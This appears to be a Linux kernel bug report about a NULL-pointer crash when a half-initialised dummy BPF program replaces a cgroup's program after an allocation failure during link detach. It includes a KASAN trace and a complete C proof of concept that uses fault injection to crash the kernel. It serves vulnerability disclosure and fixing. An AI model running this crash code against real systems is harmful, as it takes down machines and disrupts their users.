Our fuzzer discovered that a kernel paging request fault can occur when
an incompletely initialized `dummy_bpf_prog.prog` (only `bpf_func` is
set) is installed into `cgrp->bpf.effective[atype]`. Subsequent
accesses—such as `prog->stats`—may then dereference NULL pointers and
crash the kernel.
`dummy_bpf_prog.prog` is used as a substitute when
`bpf_prog_array_alloc` fails, but only `bpf_func` is populated. Other
program fields (notably `stats`) remain NULL. During `BPF_LINK_DETACH`,
if `bpf_prog_array_alloc` fails (e.g. due to memory exhaustion or a
failslab injection), `dummy_bpf_prog.prog` can replace the previous
`old_prog` in `cgrp->bpf.effective[atype]`. Subsequent BPF program
execution may access `dummy_bpf_prog.prog.stats`, which is never
initialized (NULL), causing a kernel panic (unable to handle kernel
paging request).
Reported-by: Yinhao Hu <
ddd...@hust.edu.cn>
Reported-by: Kaiyan Mei <
M2024...@hust.edu.cn>
Reviewed-by: Dongliang Mu <
dz...@hust.edu.cn>
## Reproduction steps
1. Enable BPF runtime statistics so that the stats-enabled code path is
exercised.
2. Load a minimal BPF program and create a BPF link attached to
`BPF_CGROUP_INET_EGRESS`.
3. Configure a failslab / fault injection so that `bpf_prog_array_alloc`
is likely to fail during detach.
4. Detach the BPF link. If `bpf_prog_array_alloc` fails, the kernel will
insert `dummy_bpf_prog.prog` into the cgroup `bpf.effective` array.
5. Send a socket packet that triggers the cgroup egress BPF program —
the kernel will attempt to run the dummy prog and dereference NULL
fields (e.g. `prog->stats`), causing a crash.
---
## KASAN report
```text
[ 11.233750] BUG: unable to handle page fault for address:
ffff8881911f8000
[ 11.281523] #PF: supervisor write access in kernel mode
[ 11.282126] #PF: error_code(0x0002) - not-present page
[ 11.282725] PGD 9e01067 P4D 9e01067 PUD 0
[ 11.283214] Oops: Oops: 0002 [#1] SMP KASAN NOPTI
[ 11.283768] CPU: 0 UID: 1000 PID: 334 Comm: sshd Not tainted
6.18.0-rc4-next-20251107 #8 PREEMPT(none)
[ 11.284831] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX,
1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 11.285894] RIP: 0010:__cgroup_bpf_run_filter_skb+0xf46/0x15d0
[ 11.286306] Code: d9 cb 86 48 be 00 00 00 00 00 fc ff df 49 89 fb 49
c1 eb 03 41 80 3c 33 00 0f 85 cf 05 00 00 48 03 0c c5 a0 d9 cb 86 48 89
c8 <48> ff 01 48 8b 4c 24 78 48 01 48 08 e9 6e f9 ff ff bf 01 00 00 00
[ 11.287590] RSP: 0018:ffff8881142ef000 EFLAGS: 00010286
[ 11.287965] RAX: ffff8881911f8000 RBX: ffff88811757bc60 RCX:
ffff8881911f8000
[ 11.288462] RDX: 0000000000000001 RSI: dffffc0000000000 RDI:
ffffffff86cbd9a0
[ 11.288961] RBP: ffffffff879d90c2 R08: 0000000000000001 R09:
0000000000000001
[ 11.289453] R10: 0000000080000000 R11: 1ffffffff0d97b34 R12:
ffff8881128d5c10
[ 11.289952] R13: dffffc0000000000 R14: ffffffff879d90c0 R15:
ffff8881142ef0d8
[ 11.290455] FS: 00007cc4577f0900(0000) GS:ffff8881911f8000(0000)
knlGS:0000000000000000
[ 11.291018] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 11.291428] CR2: ffff8881911f8000 CR3: 00000001030ea000 CR4:
0000000000750ef0
[ 11.291927] PKRU: 55555554
[ 11.292125] Call Trace:
[ 11.292305] <TASK>
[ 11.292809] ? __pfx___cgroup_bpf_run_filter_skb+0x10/0x10
[ 11.293201] ip_finish_output+0x1ee/0x320
[ 11.293493] ip_output+0x170/0x2e0
[ 11.293740] ? __pfx_ip_output+0x10/0x10
[ 11.294022] ? __pfx_stack_trace_save+0x10/0x10
[ 11.294344] ? __pfx_ip_finish_output+0x10/0x10
[ 11.294674] ? kasan_save_track+0x10/0x30
[ 11.295305] ? ipv4_dst_check+0x10b/0x160
[ 11.295598] __ip_queue_xmit+0xcfc/0x1d60
[ 11.296230] ? __skb_clone+0x555/0x740
[ 11.296508] __tcp_transmit_skb+0x2c54/0x3de0
[ 11.296830] ? __pfx___tcp_transmit_skb+0x10/0x10
[ 11.298200] ? try_charge_memcg+0x27c/0xc10
[ 11.298848] tcp_write_xmit+0x12dd/0x7e20
[ 11.299478] ? mem_cgroup_sk_charge+0x9b/0xe0
[ 11.299794] ? preempt_count_add+0x77/0x150
[ 11.300434] ? __virt_addr_valid+0x1d0/0x2d0
[ 11.300745] __tcp_push_pending_frames+0x90/0x2f0
[ 11.301077] tcp_sendmsg_locked+0x1374/0x45e0
[ 11.301394] ? __pfx_tcp_sendmsg_locked+0x10/0x10
[ 11.301731] ? __pfx_aa_file_perm+0x10/0x10
[ 11.302715] ? _raw_spin_lock_bh+0x86/0xe0
[ 11.303010] tcp_sendmsg+0x27/0x40
[ 11.303261] sock_write_iter+0x474/0x590
[ 11.303885] ? __pfx_sock_write_iter+0x10/0x10
[ 11.304549] ? security_file_permission+0x7a/0xe0
[ 11.305299] ? rw_verify_area+0x6d/0x450
[ 11.305658] vfs_write+0xa95/0xde0
[ 11.305953] ? _raw_spin_lock_irq+0x8c/0xe0
[ 11.306314] ? __pfx_vfs_write+0x10/0x10
[ 11.307043] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 11.307834] ? fdget_pos+0x54/0x4b0
[ 11.308143] ksys_write+0x17d/0x1c0
[ 11.308440] ? __pfx_ksys_write+0x10/0x10
[ 11.308785] ? __x64_sys_rt_sigprocmask+0x188/0x230
[ 11.309202] ? __pfx___x64_sys_rt_sigprocmask+0x10/0x10
[ 11.309621] do_syscall_64+0x76/0x6b0
[ 11.309926] ? ksys_write+0x17d/0x1c0
[ 11.310640] ? do_syscall_64+0xa2/0x6b0
[ 11.311339] ? __x64_sys_select+0xb9/0x150
[ 11.311687] ? __pfx_kern_select+0x10/0x10
[ 11.312417] ? do_syscall_64+0xa2/0x6b0
[ 11.312726] ? vfs_read+0x6e2/0xa20
[ 11.313817] ? _raw_spin_lock_irq+0x8c/0xe0
[ 11.314173] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 11.314956] ? __task_pid_nr_ns+0x130/0x2a0
[ 11.316134] ? _raw_spin_lock_irq+0x8c/0xe0
[ 11.316488] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 11.316866] ? __pfx_sigprocmask+0x10/0x10
[ 11.317618] ? recalc_sigpending+0x16c/0x220
[ 11.318733] ? sigprocmask+0x17e/0x330
[ 11.319046] ? __pfx_sigprocmask+0x10/0x10
[ 11.320143] ? __x64_sys_rt_sigprocmask+0x16d/0x230
[ 11.320539] ? __pfx___x64_sys_rt_sigprocmask+0x10/0x10
[ 11.321360] ? do_syscall_64+0xa2/0x6b0
[ 11.322490] ? do_syscall_64+0xa2/0x6b0
[ 11.322811] ? switch_fpu_return+0xf6/0x200
[ 11.323519] ? do_syscall_64+0x24c/0x6b0
[ 11.324223] ? do_syscall_64+0xa2/0x6b0
[ 11.324937] ? do_syscall_64+0xa2/0x6b0
[ 11.325657] ? do_syscall_64+0xa2/0x6b0
[ 11.325959] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 11.326359] RIP: 0033:0x7cc457c3d513
[ 11.326665] Code: 8b 15 81 29 0e 00 f7 d8 64 89 02 48 c7 c0 ff ff ff
ff eb b7 0f 1f 00 64 8b 04 25 18 00 00 00 85 c0 75 14 b8 01 00 00 00 0f
05 <48> 3d 00 f0 ff ff 77 55 c3 0f 1f 40 00 48 83 ec 28 48 89 54 24 18
[ 11.328137] RSP: 002b:00007ffda89c3148 EFLAGS: 00000246 ORIG_RAX:
0000000000000001
[ 11.328749] RAX: ffffffffffffffda RBX: 000000000000004c RCX:
00007cc457c3d513
[ 11.329327] RDX: 000000000000004c RSI: 00005be29ed1f530 RDI:
0000000000000004
[ 11.329904] RBP: 00005be29ed554b0 R08: 000000050cfc1417 R09:
0000000000000200
[ 11.330488] R10: 00007cc458377000 R11: 0000000000000246 R12:
00005be274a26768
[ 11.331047] R13: 0000000000000000 R14: 0000000000000004 R15:
00005be2749dbac0
[ 11.331616] </TASK>
[ 11.331793] Modules linked in:
[ 11.332055] CR2: ffff8881911f8000
[ 11.332339] ---[ end trace 0000000000000000 ]---
```
---
## Proof of Concept
The following C program demonstrates the issue on linux-next
6.18.0-rc4-next-20251107:
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <pthread.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sched.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/bpf.h>
/*
 * Issue the raw bpf system call through syscall(2).
 *
 * cmd:  BPF command number.
 * attr: command-specific attribute union handed to the kernel.
 * size: number of bytes of *attr the kernel should consider.
 *
 * Returns whatever syscall() returned, narrowed to int.
 */
static inline int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr,
                          unsigned int size)
{
    long rc = syscall(__NR_bpf, cmd, attr, size);

    return (int)rc;
}
/*
 * Generate a small amount of outbound TCP traffic on a fresh socket.
 *
 * A non-blocking TCP socket is created, a connect() to 8.8.8.8:80 is started
 * and a short HTTP request is handed to send(). Every step after socket() is
 * best effort: the results of connect()/send() are deliberately ignored,
 * because the only purpose is to push packets through the egress path
 * (presumably the SYN emitted by connect() is already enough -- not verified
 * here).
 *
 * arg: unused; main() passes NULL.
 *
 * Always returns NULL.
 */
void *traffic_thread(void *arg)
{
    struct sockaddr_in addr = {0};
    char buf[1024] = "GET / HTTP/1.0\r\n\r\n";
    int opt = 1;
    int flags;
    int sock;

    (void)arg;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        return NULL;
    }

    setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    /*
     * Never OR O_NONBLOCK into a failed F_GETFL result (-1); fall back to an
     * empty flag set so the socket still becomes non-blocking and connect()
     * below cannot stall.
     */
    flags = fcntl(sock, F_GETFL, 0);
    if (flags < 0) {
        flags = 0;
    }
    fcntl(sock, F_SETFL, flags | O_NONBLOCK);

    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);
    inet_pton(AF_INET, "8.8.8.8", &addr.sin_addr);

    /* Non-blocking: expected to return immediately (typically EINPROGRESS). */
    connect(sock, (struct sockaddr *)&addr, sizeof(addr));

    /*
     * MSG_NOSIGNAL: if connect() failed outright the stream socket is not
     * connected, and send() would otherwise raise SIGPIPE and kill the
     * process instead of just returning EPIPE.
     */
    send(sock, buf, strlen(buf), MSG_DONTWAIT | MSG_NOSIGNAL);

    close(sock);
    return NULL;
}
/*
 * Proof-of-concept driver.
 *
 * Sequence:
 *   1. Open the root cgroup directory (/sys/fs/cgroup).
 *   2. Load a two-instruction BPF_PROG_TYPE_CGROUP_SKB program (r0 = 1; exit).
 *   3. Attach it to the cgroup at BPF_CGROUP_INET_EGRESS through a BPF link.
 *   4. Enable BPF run-time statistics.
 *   5. Configure failslab and arm /proc/self/fail-nth for this task.
 *   6. Detach the link, then generate egress traffic with traffic_thread().
 *
 * Returns 0 once the whole sequence has been issued, or 1 if a mandatory
 * setup step (cgroup open, program load, link creation) fails. Failures of
 * the optional steps (stats, fault injection) only produce a warning.
 */
int main(void)
{
    int cgroup_fd, prog_fd, link_fd, stats_fd, failslab_fd, fail_fd;
    int detach_rc, detach_errno;
    union bpf_attr attr;
    struct bpf_insn prog[] = {
        { 0xb7, 0, 0, 0, 1 }, /* r0 = 1 */
        { 0x95, 0, 0, 0, 0 }  /* exit */
    };

    cgroup_fd = open("/sys/fs/cgroup", O_RDONLY | O_DIRECTORY);
    if (cgroup_fd < 0) {
        perror("open cgroup");
        return 1;
    }

    /* Create BPF program */
    memset(&attr, 0, sizeof(attr));
    attr.prog_type = BPF_PROG_TYPE_CGROUP_SKB;
    attr.insn_cnt = sizeof(prog) / sizeof(prog[0]);
    attr.insns = (unsigned long)prog;
    attr.license = (unsigned long)"GPL";
    prog_fd = sys_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
    if (prog_fd < 0) {
        perror("BPF_PROG_LOAD");
        close(cgroup_fd);
        return 1;
    }

    /* Create link and attach to cgroup */
    memset(&attr, 0, sizeof(attr));
    attr.link_create.prog_fd = prog_fd;
    attr.link_create.target_fd = cgroup_fd;
    attr.link_create.attach_type = BPF_CGROUP_INET_EGRESS;
    link_fd = sys_bpf(BPF_LINK_CREATE, &attr, sizeof(attr));
    if (link_fd < 0) {
        perror("BPF_LINK_CREATE");
        close(prog_fd);
        close(cgroup_fd);
        return 1;
    }

    /*
     * Enable BPF runtime statistics (so stats-enabled paths run).
     * The UAPI documentation for BPF_ENABLE_STATS states that statistics are
     * switched off again by close(2) on the returned descriptor, so it is
     * kept open until the traffic has been sent.
     */
    memset(&attr, 0, sizeof(attr));
    attr.enable_stats.type = BPF_STATS_RUN_TIME;
    stats_fd = sys_bpf(BPF_ENABLE_STATS, &attr, sizeof(attr));
    if (stats_fd < 0) {
        printf("[!] Warning: Failed to enable BPF stats (errno=%d). The "
               "crash path may not trigger.\n", errno);
    } else {
        printf("[+] BPF runtime statistics enabled (fd=%d)\n", stats_fd);
    }

    /*
     * Enable failslab / fault injection to make allocation fail.
     * ignore-gfp-wait=N asks failslab to also consider allocations that are
     * allowed to sleep (see the kernel fault-injection documentation).
     */
    failslab_fd = open("/sys/kernel/debug/failslab/ignore-gfp-wait",
                       O_WRONLY);
    if (failslab_fd >= 0) {
        if (write(failslab_fd, "N", 1) == 1) {
            printf("[+] Set ignore-gfp-wait=N\n");
        } else {
            perror("write ignore-gfp-wait");
        }
        close(failslab_fd);
    }

    /*
     * Arm fail-nth with "3" for this task. From here until BPF_LINK_DETACH
     * the successful path must not issue any extra system calls, otherwise
     * the injected failure could be consumed before the detach. The warnings
     * below are only reached when arming did not happen.
     */
    fail_fd = open("/proc/self/fail-nth", O_WRONLY);
    if (fail_fd >= 0) {
        if (write(fail_fd, "3", 1) != 1) {
            perror("write fail-nth");
        }
        close(fail_fd);
    } else {
        perror("open fail-nth");
    }

    /* Detach the link. If allocation fails inside the kernel,
       dummy_bpf_prog.prog may be installed. */
    memset(&attr, 0, sizeof(attr));
    attr.link_detach.link_fd = link_fd;
    detach_rc = sys_bpf(BPF_LINK_DETACH, &attr, sizeof(attr));
    detach_errno = errno;

    /* Send traffic to trigger the cgroup egress BPF path that will run
       the dummy prog */
    traffic_thread(NULL);

    /* Reported only now so no output sits between detach and traffic. */
    if (detach_rc < 0) {
        fprintf(stderr, "[!] BPF_LINK_DETACH failed (errno=%d)\n",
                detach_errno);
    }

    if (stats_fd >= 0) {
        close(stats_fd);
    }
    close(link_fd);
    close(prog_fd);
    close(cgroup_fd);
    return 0;
}
```